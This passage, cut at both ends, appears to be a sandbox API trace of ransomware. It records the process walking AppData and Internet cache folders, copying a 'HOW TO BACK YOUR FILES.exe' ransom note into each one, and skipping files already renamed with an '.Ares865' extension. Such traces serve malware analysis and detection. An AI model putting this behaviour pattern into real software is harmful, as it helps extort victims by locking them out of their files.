lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.851] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.851] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.852] lstrcpyW (in: lpString1=0x2cce4dc, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0110.852] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.852] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xec) returned 0x2c8eb8 [0110.852] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.852] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4a3fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.852] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.852] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4a3fc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0110.852] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.852] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.852] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0110.852] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0110.852] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.852] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.853] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.853] GetLastError () returned 0x0 [0110.853] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.853] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.853] CloseHandle (hObject=0x120) returned 1 [0110.854] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.854] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.854] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.854] lstrcpyW (in: lpString1=0x2cce4ec, lpString2="Roaming" | out: lpString1="Roaming") returned="Roaming" [0110.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xfc) returned 0x336fc8 [0110.854] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.854] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0110.854] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.854] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.854] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0110.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0110.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.855] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.856] GetLastError () returned 0x0 [0110.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.856] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.856] CloseHandle (hObject=0x120) returned 1 [0110.856] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4a3fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4a3fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.856] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.856] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.856] lstrcpyW (in: lpString1=0x2cce4fc, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0110.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x110) returned 0x2d6cf0 [0110.856] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.856] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4ca120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4ca120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0110.857] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.857] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.857] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0110.857] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft" [0110.857] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.857] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\virtualized\\c\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.858] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.858] GetLastError () returned 0x0 [0110.858] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.858] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.858] CloseHandle (hObject=0x120) returned 1 [0110.858] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.858] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Virtualized\\C\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50f82a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4d4ca120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d4ca120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.859] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.859] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low" [0110.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low" [0110.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.860] GetLastError () returned 0x0 [0110.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.860] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0110.860] CloseHandle (hObject=0x120) returned 1 [0110.860] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0110.861] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0110.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.861] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0110.861] lstrcpyW (in: lpString1=0x2cce492, lpString2="AntiPhishing" | out: lpString1="AntiPhishing") returned="AntiPhishing" [0110.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0110.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xac) returned 0x2e8890 [0110.861] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0110.861] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x69e1e3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0110.861] lstrcmpiW (lpString1="Content.IE5", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.861] lstrcmpiW (lpString1="Content.IE5", lpString2="aoldtz.exe") returned 1 [0110.861] lstrcpyW (in: lpString1=0x2cce492, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0110.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0110.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2c8eb8 [0110.861] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0110.861] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x350, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0110.861] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.861] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0110.862] lstrcpyW (in: lpString1=0x2cce492, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0110.862] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0110.862] lstrlenW (lpString="Ares865") returned 7 [0110.862] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.862] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d4ca120, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d4ca120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0110.862] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0110.862] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51445650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51445650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSIMGSIZ.DAT.Ares865", cAlternateFileName="MSIMGS~1.ARE")) returned 1 [0110.862] lstrcmpiW (lpString1="MSIMGSIZ.DAT.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0110.862] lstrcmpiW (lpString1="MSIMGSIZ.DAT.Ares865", lpString2="aoldtz.exe") returned 1 [0110.862] lstrcpyW (in: lpString1=0x2cce492, lpString2="MSIMGSIZ.DAT.Ares865" | out: lpString1="MSIMGSIZ.DAT.Ares865") returned="MSIMGSIZ.DAT.Ares865" [0110.862] lstrlenW (lpString="MSIMGSIZ.DAT.Ares865") returned 20 [0110.862] lstrlenW (lpString="Ares865") returned 7 [0110.862] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.862] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x51445650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51445650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69e1e3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSIMGSIZ.DAT.Ares865", cAlternateFileName="MSIMGS~1.ARE")) returned 0 [0110.862] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0110.862] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0110.862] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5" [0110.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5" [0110.863] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0110.863] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\Low\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\low\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0110.863] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0110.864] GetLastError () returned 0x0 [0110.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0110.864] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, 